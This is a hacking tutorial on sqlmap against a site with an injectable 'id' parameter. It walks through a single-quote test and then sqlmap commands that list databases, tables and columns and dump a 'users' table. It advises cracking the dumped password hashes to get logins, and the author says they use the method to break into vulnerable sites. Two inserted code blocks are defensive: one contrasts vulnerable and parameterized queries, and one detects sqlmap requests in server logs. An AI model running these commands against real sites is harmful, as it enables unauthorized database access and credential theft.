SqlMap Tutorial [SQL Injection]
In this tutorial I will show you how to inject a SQL-vulnerable site with sqlmap. It is available in BackTrack, but on Windows you have to install Python first and then sqlmap.
So let's start....
First of all you need to install Python as well as sqlmap on your Windows machine.
You can download sqlmap from their official website.
You can download the latest Python version from here.
NOTE: The one I'm sharing here is version 2.7.2. The latest version is probably not this one but a 3.x version, but 2.7.2 is the most used version. It can be useful in many cases you face.
Urls:-
Let's say you have a URL like this
http://www.site.com/section.php?id=51
and that it is prone to SQL injection because the developer of that
site did not properly escape the parameter id. This can be simply tested
by trying to open the URL
http://www.site.com/section.php?id=51'
We just added a single quote to the parameter. If this URL throws an
error then it is clear that the database has reacted with an error
because it got an unexpected single quote.
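The flaw behind that error, and its fix, as an added example that is not part of the original tutorial. It uses an in-memory SQLite database as a constructed stand-in for the site's database; the table and function names are hypothetical.

```python
import re
import sqlite3

def make_db():
    # Constructed in-memory stand-in for the database behind section.php.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE sections (id INTEGER PRIMARY KEY, title TEXT)")
    db.executemany("INSERT INTO sections VALUES (?, ?)",
                   [(51, "Lipstick"), (52, "Unpublished draft")])
    return db

def section_vulnerable(db, raw_id):
    # The bug: the id parameter is pasted straight into the SQL text,
    # so the database parses whatever the client sent as part of the query.
    sql = "SELECT title FROM sections WHERE id = " + raw_id
    try:
        return [row[0] for row in db.execute(sql)]
    except sqlite3.Error as exc:
        # A stray quote breaks the statement; showing the error confirms the flaw.
        return "DB error: %s" % exc

def section_fixed(db, raw_id):
    # Fix 1: the parameter must be a plain integer, otherwise return nothing.
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):
        return []
    # Fix 2: bind the value as a parameter so it is never parsed as SQL.
    rows = db.execute("SELECT title FROM sections WHERE id = ?", (int(raw_id),))
    return [row[0] for row in rows]

if __name__ == "__main__":
    db = make_db()
    for value in ("51", "51'", "51 OR 1=1"):
        print(repr(value), section_vulnerable(db, value), section_fixed(db, value))
```

With the fixed handler the quoted request returns an empty result instead of a database error, so the single-quote test no longer shows a difference.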
Hacking with sqlmap :-
Now it's time to move on to sqlmap to hack such URLs. The sqlmap command is run from the terminal with the Python interpreter.
python sqlmap.py -u "http://www.site.com/section.php?id=51"
The above is the first and most simple command to run with the sqlmap
tool. It will check the URL and try to discover basic information about
the system. The output can look something like this
So the sqlmap tool has discovered the operating system, web server
and database along with version information. Even this much is pretty
impressive. But it's time to move on and see what more this tool is
capable of.
Discover Databases
In this step sqlmap shall be used to find out what databases exist on the target system. Again the command is very simple
sqlmap.py -u "http://www.site.com/section.php?id=51" --dbs
The output could be something like this
This time the output contains the available databases list. Move on...
Find tables in the database :-
Now it's time to find out what tables exist in a particular database.
Let's say the database of interest over here is 'safecosmetics'
Command
sqlmap.py -u "http://www.site.com/section.php?id=51" --tables -D safecosmetics
and the output can be something similar to this
![[Image: 86830049d78c46ed8d616f6.png]](http://img547.imageshack.us/img547/6532/86830049d78c46ed8d616f6.png)
Isn't this amazing? It is, of course. Let's get the columns of a particular table now.
Get columns of a table :-
Now that we have the list of tables with us, it would be a good idea
to get the columns of some important table. Let's say the table is
'users' and it contains the username and password.
sqlmap.py -u "http://www.site.com/section.php?id=51" --columns -D safecosmetics -T users
So now the columns are clearly visible. Good job!
Get data of the table :-
Now comes the most interesting part: extracting the data from the table. The command would be
sqlmap.py -u "http://www.site.com/section.php?id=51" --dump -D safecosmetics -T users
The above command will simply dump the data of the particular table, very much like the mysqldump command.
The hash column seems to have the password hash. Try cracking the hash
and then you would get the login details right away. sqlmap will create a
CSV file containing the dump data for easy analysis.
And this is a very cool method; I mostly use it to inject SQL-vulnerable sites.
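What the requests described above look like from the web server's side, as an added detection example that is not part of the original tutorial. The log lines, the User-Agent string and the NUMERIC_PARAMS set are constructed assumptions; sqlmap names itself in its default User-Agent, so the parameter checks are what catch a client that sends a different one.

```python
import re
from urllib.parse import urlsplit, parse_qsl

# Constructed access-log lines in combined format (documentation IP ranges).
SAMPLE_LOG = [
    '203.0.113.7 - - [10/Mar/2024:10:00:01 +0000] "GET /section.php?id=51 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [10/Mar/2024:10:02:13 +0000] "GET /section.php?id=51%27 HTTP/1.1" 500 312 "-" "Mozilla/5.0"',
    '198.51.100.23 - - [10/Mar/2024:10:05:40 +0000] "GET /section.php?id=51%20UNION%20ALL%20SELECT%20NULL HTTP/1.1" 200 5100 "-" "sqlmap/1.x (https://sqlmap.org)"',
]

LINE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "\S+ (?P<target>\S+) [^"]*" '
                  r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
KEYWORDS = re.compile(r"\bunion\b.*\bselect\b|\binformation_schema\b", re.I)
NUMERIC_PARAMS = {"id"}  # assumption: parameters the application expects to be integers

def classify(line):
    """Return (client_ip, [reasons]) for one log line, or None if it does not parse."""
    m = LINE.match(line)
    if m is None:
        return None
    reasons = []
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap-user-agent")
    # parse_qsl URL-decodes the values, so %27 is seen as a single quote.
    for name, value in parse_qsl(urlsplit(m["target"]).query, keep_blank_values=True):
        if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
            reasons.append("non-numeric-id")
        if KEYWORDS.search(value):
            reasons.append("sql-keywords")
    # A 5xx answer to a malformed parameter suggests the input reached the database.
    if reasons and m["status"].startswith("5"):
        reasons.append("server-error")
    return m["ip"], reasons

def suspicious_clients(lines):
    """Map each flagged client IP to the sorted list of reasons seen for it."""
    hits = {}
    for line in lines:
        result = classify(line)
        if result and result[1]:
            hits.setdefault(result[0], set()).update(result[1])
    return {ip: sorted(reasons) for ip, reasons in hits.items()}

if __name__ == "__main__":
    for ip, reasons in suspicious_clients(SAMPLE_LOG).items():
        print(ip, ", ".join(reasons))
```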